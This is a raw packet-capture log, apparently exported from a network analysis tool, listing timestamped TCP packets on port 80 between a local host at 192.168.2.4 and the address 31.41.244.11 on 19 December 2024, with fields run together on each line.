                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.058549881 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.058595896 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.058640003 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.059629917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.059683084 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.059735060 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.060029984 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.060749054 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.060925961 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.060973883 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.061899900 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.061997890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.062051058 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.063045979 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.063092947 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.063189030 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.063672066 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.064105988 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.064148903 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.064218044 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.064264059 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.065171957 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.065285921 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.065335989 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.066246033 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.066293001 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.066406965 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.066452980 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.067509890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.067537069 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.067578077 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.079360008 CET4434986720.233.83.145192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.187827110 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.187844992 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.187894106 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.188730955 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.188755989 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.188779116 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.188797951 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.307362080 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.307382107 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.307656050 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.426981926 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427000999 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427016973 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427035093 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427046061 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427051067 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427068949 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427074909 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427087069 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427103043 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427112103 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427112103 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427119017 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427136898 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427139044 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427153111 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427170038 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427179098 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427186966 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427206039 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427225113 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427342892 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427392960 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427408934 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427438974 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427468061 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427481890 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427483082 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427501917 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427516937 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427524090 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427524090 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427536964 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427546024 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427560091 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.427606106 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.428375959 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.428392887 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.428409100 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.428425074 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.428441048 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.428441048 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.428441048 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.428455114 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.428458929 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.428476095 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.428494930 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.428494930 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.428529024 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.428529978 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.428546906 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.428622961 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429114103 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429163933 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429179907 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429182053 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429198980 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429200888 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429217100 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429239035 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429239035 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429269075 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429446936 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429462910 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429480076 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429522038 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429522991 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429522991 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429578066 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429594040 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429609060 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429625034 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429641008 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429646015 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429646015 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429658890 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429687023 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429687023 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429706097 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429717064 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.429893017 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.430505991 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.430521011 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.430536985 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.430555105 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.430561066 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.430577993 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.430584908 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.430584908 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.430596113 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.430628061 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.430628061 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.430634975 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.430653095 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.430668116 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.430685043 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.430699110 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.430702925 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.430702925 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.430740118 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.430752039 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.435105085 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.435122967 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.435139894 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.435156107 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.435172081 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.435174942 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.435174942 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.435188055 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.435215950 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.435234070 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.435240030 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.435301065 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.435873985 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.435890913 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.435928106 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.435946941 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.436026096 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.436068058 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.436084032 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.436121941 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.436130047 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.436130047 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.436140060 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.436160088 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.436167955 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.436194897 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.436194897 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.436790943 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.436856985 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.436860085 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.436886072 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.436969995 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.437026978 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.437043905 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.437086105 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.437102079 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.437113047 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.437150955 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.437192917 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.437825918 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.437865973 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.437899113 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.437899113 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.437957048 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.437973022 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.437988997 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.438005924 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.438008070 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.438025951 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.438025951 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.438047886 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.438050032 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.438065052 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.438081980 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.438102007 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.438102007 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.438111067 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439172983 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439189911 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439205885 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439240932 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439254045 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439274073 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439290047 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439305067 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439327955 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439342022 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439359903 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439404011 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439802885 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439820051 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439835072 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439851999 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439856052 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439856052 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439867973 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439879894 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439897060 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439897060 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439929008 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439929008 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439944029 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439959049 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439974070 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439986944 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.439990997 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.440031052 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.440031052 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.440718889 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.440735102 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.440751076 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.440768003 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.440783024 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.440783978 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.440783978 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.440798998 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.440807104 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.440807104 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.440815926 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.440826893 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.440831900 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.440844059 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.440877914 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.440886974 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.440895081 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.440947056 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.441457987 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.441483974 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.441499949 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.441529989 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.441529989 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.441631079 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.441674948 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.441675901 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.441675901 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.441693068 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.441709042 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.441725969 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.441730976 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.441730976 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.441761971 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.441761971 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.442384958 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.442527056 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.442543030 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.442558050 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.442574978 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.442591906 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.442605972 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.442605972 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.442608118 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.442619085 CET4986080192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.442626953 CET804986031.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:53.442643881 CET804986031.41.244.11192.168.2.4
